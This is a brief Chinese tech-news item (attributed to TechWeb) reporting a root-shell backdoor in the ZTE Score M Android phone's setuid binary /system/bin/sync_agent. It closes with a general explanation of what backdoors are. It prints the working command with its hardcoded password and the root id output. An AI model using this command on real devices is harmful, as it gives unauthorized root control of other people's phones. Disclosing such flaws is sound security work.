中兴Score M Android手机
该手机在 /system/bin/sync_agent 有一个用于修改密码(setuid-root)的应用程序,该应用程序除了为该款手机设备提供了一个root shell后门功能外,没有其它功能:
$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)
所谓后门,是入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。文/TechWeb